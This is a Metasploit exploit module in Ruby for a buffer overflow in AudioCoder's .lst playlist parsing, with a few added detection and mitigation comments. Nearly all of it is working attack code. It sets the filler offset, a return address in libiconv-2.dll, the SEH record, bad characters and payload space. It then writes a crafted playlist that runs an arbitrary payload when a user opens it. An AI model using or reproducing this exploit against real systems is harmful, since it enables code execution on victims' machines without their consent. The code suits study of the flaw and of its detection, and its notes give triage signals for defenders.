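require 'msf/core'

# File-format module for the AudioCoder .lst playlist buffer overflow (EDB 26448).
#
# The module does not talk to a network target: it writes a crafted .lst file
# (default name msf.lst) that has to be opened in AudioCoder by a user.
#
# Layout of the generated file, as built in #exploit:
#   "http://" + <Offset bytes of random filler> + <SEH record> + <encoded payload>
#
# Detection / mitigation notes for defenders:
#   * A playlist entry that starts with "http://" and continues for hundreds of
#     bytes before turning into non-URL binary data is not a legitimate stream
#     URL; entry length is a usable triage signal for .lst files.
#   * The overwrite goes through an SEH record (Msf::Exploit::Seh), so it belongs
#     to the class of overwrite that SEHOP is designed to block; whether SEHOP
#     stops this particular target was not verified here.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  # Registers the module metadata, the single target and the FILENAME option.
  #
  # @param info [Hash] metadata passed in by the framework and merged through
  #   update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AudioCoder .lst Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in AudioCoder 0.8.18. The
        vulnerability occurs when adding an .lst, allowing arbitrary code
        execution with the privileges of the user running AudioCoder. This
        module has been tested successfully on AudioCoder 0.8.22 over
        Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'onying',    # Vulnerability discovery and PoC
          'Asesino04'  # Metasploit module
        ],
      # The original listing also carried an ['OSVDB', 'N/A'] placeholder. It
      # names no advisory, so it is dropped rather than kept as a dead reference.
      'References'     =>
        [
          [ 'EDB', '26448' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'Space'           => 6596,
          # NUL, backslash, '@', CR and LF are excluded from the payload bytes.
          'BadChars'        => "\x00\x5c\x40\x0d\x0a",
          'DisableNops'     => true,
          'StackAdjustment' => -3500
        },
      'Targets'        =>
        [
          [ 'AudioCoder 0.8.22 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'    => 0x66011b56, # libiconv-2.dll
              'Offset' => 765
            }
          ]
        ],
      'Privileged'     => false,
      # Was 'juin 01 2013' (French month name); module metadata uses English
      # month abbreviations so the date can be parsed.
      'DisclosureDate' => 'Jun 01 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst'])
      ], self.class)
  end

  # Assembles the .lst contents and writes them out through file_create.
  #
  # The content is a single "http://" entry: random filler of target['Offset']
  # bytes, the SEH record generated for target.ret, then the encoded payload.
  def exploit
    buffer = "http://"
    buffer << rand_text(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded

    file_create(buffer)
  end
end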